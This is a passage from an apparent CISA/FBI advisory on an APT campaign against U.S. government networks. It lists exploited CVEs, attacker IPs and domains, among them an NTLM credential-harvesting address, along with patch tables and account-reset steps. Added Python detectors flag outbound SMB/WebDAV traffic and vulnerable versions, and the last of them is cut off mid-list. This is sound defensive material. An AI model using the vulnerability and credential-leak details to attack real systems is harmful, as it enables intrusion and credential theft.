href="https://attack.mitre.org/versions/v7/techniques/T1110">T1110</a>]; <em>Exploit Public Facing Application</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1190/">T1190</a>]). 
The APT actor also hosted malicious domains, including possible aviation sector target <code>columbusairports.microsoftonline[.]host</code>, which resolved to <code>108.177.235[.]92</code> and <code>[cityname].westus2.cloudapp.azure.com</code>; these domains are U.S. registered and are likely SLTT government targets (<em>Drive-By Compromise </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1189">T1189</a>]).</p> <p>The APT actor scanned for vulnerable Citrix and Microsoft Exchange services and identified vulnerable systems, likely for future exploitation. This actor continues to exploit a Citrix Directory Traversal Bug (<a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19781">CVE-2019-19781</a>) and a Microsoft Exchange remote code execution flaw (<a href="https://nvd.nist.gov/vuln/detail/CVE-2020-0688">CVE-2020-0688</a>).</p> <p>The APT actor has been observed using Cisco AnyConnect Secure Socket Layer (SSL) virtual private network (VPN) connections to enable remote logins on at least one victim network, possibly enabled by an Exim Simple Mail Transfer Protocol (SMTP) vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2019-10149">CVE-2019-10149</a>) (<em>External Remote Services</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1133">T1133</a>]). More recently, the APT actor enumerated and exploited a Fortinet VPN vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2018-13379">CVE-2018-13379</a>) for Initial Access [<a href="https://attack.mitre.org/versions/v7/tactics/TA0001/">TA0001</a>] and a Windows Netlogon vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1472">CVE-2020-1472</a>) to obtain access to Windows Active Directory (AD) servers for Privilege Escalation [<a href="https://attack.mitre.org/versions/v7/tactics/TA0004/">TA0004</a>] within the network (<em>Valid Accounts</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1078">T1078</a>]). 
These vulnerabilities can also be leveraged to compromise other devices on the network (<em>Lateral Movement</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0008/">TA0008</a>]) and to maintain <em>Persistence</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0003/">TA0003</a>]).</p> <p>Between early February and mid-September, these APT actors used <code>213.74.101[.]65</code>, <code>212.252.30[.]170</code>, <code>5.196.167[.]184</code>, <code>37.139.7[.]16</code>, <code>149.56.20[.]55</code>, <code>91.227.68[.]97</code>, and <code>5.45.119[.]124</code> to target U.S. SLTT government networks. Successful authentications—including the compromise of Microsoft Office 365 (O365) accounts—have been observed on at least one victim network (<em>Valid Accounts</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1078">T1078</a>]).</p> <h3>Mitigations</h3><h4>Indicators of Compromise</h4> <p>The APT actor used the following IP addresses and domains to carry out its objectives:</p> <ul> <li><code>213.74.101[.]65</code></li> <li><code>213.74.139[.]196</code></li> <li><code>212.252.30[.]170</code></li> <li><code>5.196.167[.]184</code></li> <li><code>37.139.7[.]16</code></li> <li><code>149.56.20[.]55</code></li> <li><code>91.227.68[.]97</code></li> <li><code>138.201.186[.]43</code></li> <li><code>5.45.119[.]124</code></li> <li><code>193.37.212[.]43</code></li> <li><code>146.0.77[.]60</code></li> <li><code>51.159.28[.]101</code></li> <li><code>columbusairports.microsoftonline[.]host</code></li> <li><code>microsoftonline[.]host</code></li> <li><code>email.microsoftonline[.]services</code></li> <li><code>microsoftonline[.]services</code></li> <li><code>cityname[.]westus2.cloudapp.azure.com</code></li> </ul> <p>IP address <code>51.159.28[.]101</code> appears to have been configured to receive stolen Windows New Technology Local Area Network Manager (NTLM) credentials. 
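An added example (not from the advisory) of the log review this implies: Python that refangs the indicators listed above and flags, in constructed firewall/proxy log lines, contact with <code>51.159.28[.]101</code> or the listed domains, SMB (TCP/445) leaving the network, and WebDAV methods sent to external hosts. The key=value log format, the RFC 1918 internal ranges and the sample lines are assumptions.

```python
"""Added example, not part of the CISA advisory: egress checks for the
NTLM-leak scenario, run over constructed log lines (no real traffic)."""
import ipaddress
import re
from dataclasses import dataclass

# Indicators copied from the advisory, defanged with "[.]" as published there.
ADVISORY_IOCS = [
    "51.159.28[.]101", "213.74.101[.]65", "213.74.139[.]196", "212.252.30[.]170",
    "microsoftonline[.]host", "microsoftonline[.]services",
]

# Internal address plan (assumption: RFC 1918 only; tune to your own ranges).
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# HTTP methods only a WebDAV client sends. A Windows client that is drawn to an
# external WebDAV share may authenticate with NTLM, which is how the
# credentials the advisory describes leave the network.
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK"}


@dataclass
class Alert:
    line_no: int
    reason: str
    src: str
    dst: str


def refang(ioc: str) -> str:
    """Turn the advisory's defanged form back into a matchable value."""
    return ioc.replace("[.]", ".")


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_line(line: str) -> dict:
    """Parse one constructed 'timestamp key=value ...' log line."""
    fields = dict(re.findall(r"(\w+)=(\S+)", line))
    fields["ts"] = line.split(" ", 1)[0]
    return fields


def host_matches(host: str, domain: str) -> bool:
    """True for the domain itself or any subdomain of it."""
    return host == domain or host.endswith("." + domain)


def check_egress(lines) -> list:
    """Flag known-IOC contacts and SMB/WebDAV traffic leaving the network."""
    ioc_ips = {refang(i) for i in ADVISORY_IOCS if re.fullmatch(r"[\d.\[\]]+", i)}
    ioc_domains = {refang(i) for i in ADVISORY_IOCS} - ioc_ips
    alerts = []
    for n, line in enumerate(lines, 1):
        f = parse_line(line)
        src, dst = f.get("src"), f.get("dst")
        if not (src and dst):
            continue
        outbound = is_internal(src) and not is_internal(dst)
        if dst in ioc_ips:
            alerts.append(Alert(n, "known-ioc-ip", src, dst))
        host = f.get("host", "")
        if any(host_matches(host, d) for d in ioc_domains):
            alerts.append(Alert(n, "known-ioc-domain", src, host))
        # Internal-to-internal SMB is normal; only SMB leaving the network is flagged.
        if outbound and f.get("dport") == "445":
            alerts.append(Alert(n, "smb-egress", src, dst))
        if outbound and f.get("method", "").upper() in WEBDAV_METHODS:
            alerts.append(Alert(n, "webdav-egress", src, dst))
    return alerts


# Constructed sample log; external addresses use TEST-NET ranges.
SAMPLE_LOG = [
    "2020-10-01T13:02:11Z src=10.20.1.15 dst=51.159.28.101 dport=445 proto=tcp",
    "2020-10-01T13:02:12Z src=10.20.1.15 dst=203.0.113.7 dport=80 proto=tcp "
    "method=PROPFIND host=files.example.net",
    "2020-10-01T13:05:40Z src=10.20.1.22 dst=10.20.5.5 dport=445 proto=tcp",
    "2020-10-01T13:06:01Z src=10.20.1.22 dst=198.51.100.9 dport=443 proto=tcp "
    "method=GET host=email.microsoftonline.services",
    "2020-10-01T13:07:30Z src=10.20.1.30 dst=198.51.100.20 dport=443 proto=tcp "
    "method=GET host=www.example.org",
]


if __name__ == "__main__":
    for a in check_egress(SAMPLE_LOG):
        print(f"line {a.line_no}: {a.reason} {a.src} -> {a.dst}")
```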
FBI and CISA recommend organizations take defensive actions to mitigate the risk of leaking NTLM credentials; specifically, organizations should disable NTLM or restrict outgoing NTLM. Organizations should consider blocking IP address <code>51.159.28[.]101</code> (although this action alone may not mitigate the threat, as the APT actor has likely established, or will establish, additional infrastructure points).</p> <p>Organizations should check available logs for traffic to/from IP address <code>51.159.28[.]101</code> for indications of credential-harvesting activity. As the APT actors have likely established, or will establish, additional infrastructure points, organizations should also monitor for Server Message Block (SMB) or WebDAV activity leaving the network to other IP addresses.</p> <p>Refer to <a href="https://us-cert.cisa.gov/sites/default/files/publications/AA20-296A.stix.xml">AA20-296A.stix</a> for a downloadable copy of IOCs.</p> <h4>Network Defense-in-Depth</h4> <p>Proper network defense-in-depth and adherence to information security best practices can assist in mitigating the threat and reducing the risk to critical infrastructure. The following guidance may assist organizations in developing network defense procedures.</p> <ul> <li>Keep all applications updated according to vendor recommendations, and especially prioritize updates for external-facing applications and remote access services to address CVE-2019-19781, CVE-2020-0688, CVE-2019-10149, CVE-2018-13379, and CVE-2020-1472. 
Refer to table 1 for patch information on these CVEs.</li> </ul> <p class="text-align-center"><em>Table 1: Patch information for CVEs</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 881.467px; height: 312px; margin-left: auto; margin-right: auto;"> <thead> <tr> <th scope="col" style="width: 198px;"><strong>Vulnerability</strong></th> <th scope="col" style="width: 311px;"><strong>Vulnerable Products</strong></th> <th scope="col" style="width: 356px;"><strong>Patch Information</strong></th> </tr> </thead> <tbody> <tr> <td scope="col" style="text-align: left; width: 198px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19781">CVE-2019-19781</a></td> <td scope="col" style="text-align: left; width: 311px;"> <ul> <li>Citrix Application Delivery Controller</li> <li>Citrix Gateway</li> <li>Citrix SDWAN WANOP</li> </ul> </td> <td scope="col" style="text-align: left; width: 356px;"> <p><a href="https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/">Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0</a></p> <p><a href="https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/">Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3</a></p> <p><a href="https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/">Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0</a></p> <p><a href="https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/">Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5</a></p> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 198px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-0688">CVE-2020-0688</a></td> <td scope="col" style="text-align: left; width: 311px;"> <ul> <li>Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30</li> <li>Microsoft Exchange Server 2013 Cumulative Update 23</li> <li>Microsoft Exchange Server 2016 Cumulative Update 14</li> <li>Microsoft Exchange Server 2016 Cumulative Update 15</li> <li>Microsoft Exchange Server 2019 Cumulative Update 3</li> <li>Microsoft Exchange Server 2019 Cumulative Update 4</li> </ul> </td> <td scope="col" style="text-align: left; width: 356px;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688">Microsoft Security Advisory for CVE-2020-0688</a></td> </tr> <tr> <td scope="col" style="text-align: left; width: 198px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-10149">CVE-2019-10149</a></td> <td scope="col" style="text-align: left; width: 311px;"> <ul> <li>Exim versions 4.87–4.91</li> </ul> </td> <td scope="col" style="text-align: left; width: 356px;"><a href="https://www.exim.org/static/doc/security/CVE-2019-10149.txt">Exim page for CVE-2019-10149</a></td> </tr> <tr> <td scope="col" style="text-align: left; width: 198px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2018-13379">CVE-2018-13379</a></td> <td scope="col" style="text-align: left; width: 311px;"> <ul> <li>FortiOS 6.0: 6.0.0 to 6.0.4</li> <li>FortiOS 5.6: 5.6.3 to 5.6.7</li> <li>FortiOS 5.4: 5.4.6 to 5.4.12</li> </ul> </td> <td scope="col" style="text-align: left; width: 356px;"><a href="https://www.fortiguard.com/psirt/FG-IR-18-384">Fortinet Security Advisory: FG-IR-18-384</a></td> </tr> <tr> <td scope="col" style="text-align: left; width: 198px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1472">CVE-2020-1472</a></td> <td scope="col" style="text-align: left; width: 311px;"> <ul> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li> <li>Windows Server 2012</li> <li>Windows Server 2012 (Server Core installation)</li> <li>Windows Server 2012 R2</li> <li>Windows Server 2016</li> <li>Windows Server 2019</li> <li>Windows Server 2019 (Server Core installation)</li> <li>Windows Server, version 1903 (Server Core installation)</li> <li>Windows Server, version 1909 (Server Core installation)</li> <li>Windows Server, version 2004 (Server Core installation)</li> </ul> </td> <td scope="col" style="text-align: left; width: 356px;"> <p><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472">Microsoft Security Advisory for CVE-2020-1472</a></p> </td> </tr> </tbody> </table> <ul> <li>Follow Microsoft’s <a href="https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc">guidance</a> on monitoring logs for activity related to the Netlogon vulnerability, CVE-2020-1472.</li> <li>If appropriate for your organization’s network, prevent external communication of all versions of SMB and related protocols at the network boundary by blocking Transmission Control Protocol (TCP) ports 139 and 445 and User Datagram Protocol (UDP) port 137. 
See the CISA publication on <a href="https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices">SMB Security Best Practices</a> for more information.</li> <li>Implement the prevention, detection, and mitigation strategies outlined in: <ul> <li>CISA Alert <a href="https://us-cert.cisa.gov/ncas/alerts/TA15-314A">TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance</a>.</li> <li>National Security Agency Cybersecurity Information Sheet <a href="https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2159419/detect-prevent-cyber-attackers-from-exploiting-web-servers-via-web-shell-malware/">U/OO/134094-20 – Detect and Prevent Web Shells Malware</a>.</li> </ul> </li> <li>Isolate external facing services in a network demilitarized zone (DMZ) since they are more exposed to malicious activity; enable robust logging, and monitor the logs for signs of compromise.</li> <li>Establish a training mechanism to inform end users on proper email and web usage, highlighting current information and analysis and including common indicators of phishing. End users should have clear instructions on how to report unusual or suspicious emails.</li> <li>Implement application controls to only allow execution from specified application directories. System administrators may implement this through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from <code>PROGRAMFILES</code>, <code>PROGRAMFILES(X86)</code>, and <code>WINDOWS</code> folders. 
All other locations should be disallowed unless an exception is granted.</li> <li>Block Remote Desktop Protocol (RDP) connections originating from untrusted external addresses unless an exception exists; review exceptions regularly for validity.</li> </ul> <h4>Comprehensive Account Resets</h4> <p>For accounts where NTLM password hashes or Kerberos tickets may have been compromised (e.g., through CVE-2020-1472), a double password reset may be required in order to prevent continued exploitation of those accounts. For domain-admin-level credentials, a reset of KRB-TGT “Golden Tickets” may be required, and Microsoft has released specialized <a href="https://docs.microsoft.com/en-us/azure-advanced-threat-protection/domain-dominance-alerts">guidance</a> for this. Such a reset should be performed very carefully if needed.</p> <p>If there is an observation of <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472">CVE-2020-1472</a> Netlogon activity or other indications of valid credential abuse, it should be assumed the APT actors have compromised AD administrative accounts. In such cases, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through “creative destruction,” wherein, as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed in on-premises as well as Azure-hosted AD instances.</p> <p>Note that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.</p> <p>It is critical to perform a full password reset on all user and computer accounts in the AD forest. 
Use the following steps as a guide.</p> <ol> <li>Create a temporary administrator account, and use this account only for all administrative actions</li> <li>Reset the Kerberos Ticket Granting Ticket (<code>krbtgt</code>) password [<a href="https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password">1</a>]; this must be completed before any additional actions (a second reset will take place in step 5)</li> <li>Wait for the <code>krbtgt</code> reset to propagate to all domain controllers (time may vary)</li> <li>Reset all account passwords (passwords should be 15 characters or more and randomly assigned): <ol type="a"> <li>User accounts (forced reset with no legacy password reuse)</li> <li>Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])</li> <li>Service accounts</li> <li>Directory Services Restore Mode (DSRM) account</li> <li>Domain Controller machine account</li> <li>Application passwords</li> </ol> </li> <li>Reset the <code>krbtgt</code> password again</li> <li>Wait for the <code>krbtgt</code> reset to propagate to all domain controllers (time may vary)</li> <li>Reboot domain controllers</li> <li>Reboot all endpoints</li> </ol> <p>The following accounts should be reset:</p> <ul> <li>AD Kerberos Authentication Master (2x)</li> <li>All Active Directory Accounts</li> <li>All Active Directory Admin Accounts</li> <li>All Active Directory Service Accounts</li> <li>All Active Directory User Accounts</li> <li>DSRM Account on Domain Controllers</li> <li>Non-AD Privileged Application Accounts</li> <li>Non-AD Unprivileged Application Accounts</li> <li>Non-Windows Privileged Accounts</li> <li>Non-Windows User Accounts</li> <li>Windows Computer Accounts</li> <li>Windows Local Admin</li> </ul> <h4>VPN Vulnerabilities</h4> <p>Implement the following recommendations to secure your organization’s VPNs:</p> <ul> <li><strong>Update VPNs, network 
infrastructure devices, and devices</strong> being used to remote into work environments with the latest software patches and security configurations. See CISA Tips <a href="https://us-cert.cisa.gov/ncas/tips/ST04-006">Understanding Patches and Software Updates</a> and <a href="https://us-cert.cisa.gov/ncas/tips/ST18-001">Securing Network Infrastructure Devices</a>. Wherever possible, enable automatic updates.</li> <li><strong>Implement MFA on all VPN connections to increase security</strong>. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips <a href="https://us-cert.cisa.gov/ncas/tips/ST04-002">Choosing and Protecting Passwords</a> and <a href="https://us-cert.cisa.gov/ncas/tips/ST05-012">Supplementing Passwords</a> for more information.</li> </ul> <p>Discontinue unused VPN servers to reduce your organization’s attack surface, as they may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:</p> <ul> <li><strong>Audit</strong> configuration and patch management programs.</li> <li><strong>Monitor</strong> network traffic for unexpected and unapproved protocols, especially outbound to the Internet (e.g., Secure Shell [SSH], SMB, RDP).</li> <li><strong>Implement</strong> MFA, especially for privileged accounts.</li> <li><strong>Use</strong> separate administrative accounts on separate administration workstations.</li> <li><strong>Keep</strong> <a href="https://us-cert.cisa.gov/ncas/tips/ST04-006">software up to date</a>. 
Enable automatic updates, if available.</li> </ul> <h3>Contact Information</h3><p>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href="http://www.fbi.gov/contact-us/field">www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at <a href="mailto:CyWatch@fbi.gov">CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href="mailto:Central@cisa.dhs.gov">Central@cisa.dhs.gov</a>.</p> <h3>Resources</h3> <ul> <li>APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations – <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-283a">https://us-cert.cisa.gov/ncas/alerts/aa20-283a</a></li> <li>CISA Activity Alert CVE-2019-19781 – <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-031a">https://us-cert.cisa.gov/ncas/alerts/aa20-031a</a></li> <li>CISA Vulnerability Bulletin – <a href="https://us-cert.cisa.gov/ncas/bulletins/SB19-161">https://us-cert.cisa.gov/ncas/bulletins/SB19-161</a></li> <li>CISA Current Activity – <a href="https://us-cert.cisa.gov/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688">https://us-cert.cisa.gov/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688</a></li> <li>Citrix Directory Traversal Bug (CVE-2019-19781) – <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19781">https://nvd.nist.gov/vuln/detail/CVE-2019-19781</a></li> <li>Microsoft Exchange remote code 
execution flaw (CVE-2020-0688) – <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-0688">https://nvd.nist.gov/vuln/detail/CVE-2020-0688</a></li> <li>CVE-2018-13379 – <a href="https://nvd.nist.gov/vuln/detail/CVE-2018-13379">https://nvd.nist.gov/vuln/detail/CVE-2018-13379</a></li> <li>CVE-2020-1472 – <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1472">https://nvd.nist.gov/vuln/detail/CVE-2020-1472</a></li> <li>CVE-2019-10149 – <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-10149">https://nvd.nist.gov/vuln/detail/CVE-2019-10149</a></li> <li>NCCIC/US-CERT Alert TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance – <a href="https://us-cert.cisa.gov/ncas/alerts/TA15-314A">https://us-cert.cisa.gov/ncas/alerts/TA15-314A</a></li> <li>NCCIC/US-CERT publication on SMB Security Best Practices – <a href="https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices">https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices</a></li> </ul> <div class="special_container text-align-center"><strong><em>DISCLAIMER</em></strong></div> <div class="special_container"> <p><em>This information is provided "as is" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. 
In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information.</em></p> <p><em>The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.</em></p> </div> <h3>References</h3> <ul> <li><a href="https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password">[1] Microsoft: AD Forest Recovery - Resetting the krbtgt password</a></li> </ul> <h3>Revisions</h3> <ul> <li>October 22, 2020: Initial Version</li> <li>November 17, 2020: Added U.S. Heat Map of Activity</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>
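<p>The outbound SMB/WebDAV monitoring that the AA20-296A mitigations above recommend for detecting NTLM credential leakage, as an added example that is not CISA's code: it scans constructed firewall log lines for SMB/NetBIOS (TCP 139/445, UDP 137) or WebDAV requests leaving RFC1918 space and for any traffic to the advisory's collector address. The key=value log format, the internal address ranges and every address other than 51.159.28[.]101 are assumptions made for the demonstration.</p>

```python
"""Flag outbound SMB/NetBIOS and WebDAV traffic that could leak NTLM credentials.

Added example, not CISA's code. The key=value log format and every address
except the advisory's IOC are constructed for the demonstration.
"""
import ipaddress
from typing import Dict, List, Optional

# Address the advisory reports as configured to receive stolen NTLM credentials.
KNOWN_NTLM_COLLECTORS = {"51.159.28.101"}

# (protocol, port) pairs the advisory recommends blocking at the network boundary.
SMB_PORTS = {("tcp", 139), ("tcp", 445), ("udp", 137)}

# Request methods that only WebDAV clients send; the Windows WebDAV client will
# answer an NTLM challenge from whatever server it is talking to.
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "LOCK", "UNLOCK", "MOVE", "COPY"}

# Address space treated as internal (an assumption); anything else is
# "leaving the network" in the advisory's sense.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def parse_line(line: str) -> Dict[str, str]:
    """Parse '<timestamp> key=value key=value ...' into a dict (constructed format)."""
    ts, _, rest = line.strip().partition(" ")
    fields = {"ts": ts}
    for token in rest.split():
        key, sep, value = token.partition("=")
        if sep:
            fields[key] = value
    return fields


def is_external(addr: str) -> bool:
    """True when the address is outside the internal ranges above."""
    ip = ipaddress.ip_address(addr)
    return not any(ip in net for net in INTERNAL_NETS)


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return a finding label for one parsed event, or None when it is benign.

    Internal SMB and WebDAV are normal and ignored; the checks only apply to
    destinations outside the network, in decreasing order of severity.
    """
    dst = event.get("dst")
    if not dst or not is_external(dst):
        return None
    if dst in KNOWN_NTLM_COLLECTORS:
        return "critical: traffic to known NTLM credential collector"
    try:
        port = int(event.get("dport", ""))
    except ValueError:
        port = -1
    if (event.get("proto", "").lower(), port) in SMB_PORTS:
        return "high: SMB/NetBIOS leaving the network"
    if event.get("method", "").upper() in WEBDAV_METHODS:
        return "medium: WebDAV request to external host"
    return None


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run classify() over log lines. Denied connections are kept: the attempt
    alone shows a host trying to authenticate outward and is worth triage."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        event = parse_line(line)
        label = classify(event)
        if label:
            findings.append({"ts": event["ts"], "src": event.get("src", "?"),
                             "dst": event["dst"], "action": event.get("action", "?"),
                             "finding": label})
    return findings


# Constructed sample log: one hit per finding type plus benign internal traffic.
SAMPLE_LOG = """\
2020-10-15T13:02:11Z src=10.20.3.41 dst=51.159.28.101 proto=tcp dport=445 action=allow
2020-10-15T13:02:15Z src=10.20.3.41 dst=10.20.0.5 proto=tcp dport=445 action=allow
2020-10-15T13:03:02Z src=10.20.7.9 dst=203.0.113.77 proto=udp dport=137 action=deny
2020-10-15T13:05:40Z src=10.20.7.9 dst=203.0.113.77 proto=tcp dport=80 action=allow method=PROPFIND
2020-10-15T13:06:01Z src=10.20.9.2 dst=203.0.113.90 proto=tcp dport=443 action=allow method=GET
2020-10-15T13:07:30Z src=192.168.50.4 dst=192.168.50.10 proto=tcp dport=80 action=allow method=PROPFIND
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f['ts']} {f['src']} -> {f['dst']} [{f['action']}] {f['finding']}")
```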

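<p>A check of a device inventory against the vulnerable version ranges in Table 1 of AA20-296A above (FortiOS for CVE-2018-13379, Exim for CVE-2019-10149) and the PAN-OS ranges for CVE-2020-2021 in the AA20-283A table further down, as an added example that is not CISA's code. "X to Y" ranges are treated as inclusive and "earlier than Y" as exclusive; the inventory hostnames and versions are constructed, and ignoring vendor suffixes such as "-h1" during comparison is an assumption about how those versions are written.</p>

```python
"""Match a device inventory against the vulnerable version ranges in the advisory tables.

Added example, not CISA's code. The ranges are transcribed from the tables;
the inventory below is constructed.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

Version = Tuple[int, ...]


def parse_version(text: str) -> Version:
    """Turn a dotted version such as "6.0.4" into a tuple of ints.

    Only the leading digits of each component are used, so a vendor suffix
    like "9.1.3-h1" compares as 9.1.3 (an assumption about suffix format).
    """
    parts: List[int] = []
    for comp in text.strip().split("."):
        digits = ""
        for ch in comp:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            raise ValueError(f"unparseable version component {comp!r} in {text!r}")
        parts.append(int(digits))
    return tuple(parts)


def compare(a: Version, b: Version) -> int:
    """Three-way compare, padding the shorter tuple with zeros (4.87 == 4.87.0)."""
    width = max(len(a), len(b))
    a, b = a + (0,) * (width - len(a)), b + (0,) * (width - len(b))
    return (a > b) - (a < b)


@dataclass(frozen=True)
class VulnRange:
    cve: str
    product: str
    low: str              # inclusive lower bound
    high: str             # upper bound
    high_inclusive: bool  # "X to Y" ranges are inclusive; "earlier than Y" is not

    def contains(self, version: Version) -> bool:
        if compare(version, parse_version(self.low)) < 0:
            return False
        c = compare(version, parse_version(self.high))
        return c <= 0 if self.high_inclusive else c < 0


# Ranges as given in the advisory tables. "All versions of PAN-OS 8.0" is
# encoded as 8.0.0 <= v < 8.1.0.
VULNERABLE_RANGES: List[VulnRange] = [
    VulnRange("CVE-2018-13379", "FortiOS", "6.0.0", "6.0.4", True),
    VulnRange("CVE-2018-13379", "FortiOS", "5.6.3", "5.6.7", True),
    VulnRange("CVE-2018-13379", "FortiOS", "5.4.6", "5.4.12", True),
    VulnRange("CVE-2019-10149", "Exim", "4.87", "4.91", True),
    VulnRange("CVE-2020-2021", "PAN-OS", "9.1.0", "9.1.3", False),
    VulnRange("CVE-2020-2021", "PAN-OS", "9.0.0", "9.0.9", False),
    VulnRange("CVE-2020-2021", "PAN-OS", "8.1.0", "8.1.15", False),
    VulnRange("CVE-2020-2021", "PAN-OS", "8.0.0", "8.1.0", False),
]


def find_exposures(inventory: List[Dict[str, str]],
                   ranges: List[VulnRange] = VULNERABLE_RANGES) -> List[Tuple[str, str]]:
    """Return sorted (host, cve) pairs for every inventory entry inside a vulnerable range."""
    hits = set()
    for item in inventory:
        version = parse_version(item["version"])
        for r in ranges:
            if r.product == item["product"] and r.contains(version):
                hits.add((item["host"], r.cve))
    return sorted(hits)


# Constructed inventory; hostnames and versions are made up for the demonstration.
SAMPLE_INVENTORY = [
    {"host": "fw-edge-1", "product": "FortiOS", "version": "6.0.4"},   # last vulnerable 6.0.x
    {"host": "fw-edge-2", "product": "FortiOS", "version": "6.0.5"},   # first fixed 6.0.x
    {"host": "fw-branch", "product": "FortiOS", "version": "5.6.2"},   # below the 5.6 range
    {"host": "mail-1", "product": "Exim", "version": "4.91"},          # inclusive upper bound
    {"host": "mail-2", "product": "Exim", "version": "4.92"},
    {"host": "pa-dc", "product": "PAN-OS", "version": "9.1.3"},        # "earlier than" excludes it
    {"host": "pa-vpn", "product": "PAN-OS", "version": "9.0.8"},
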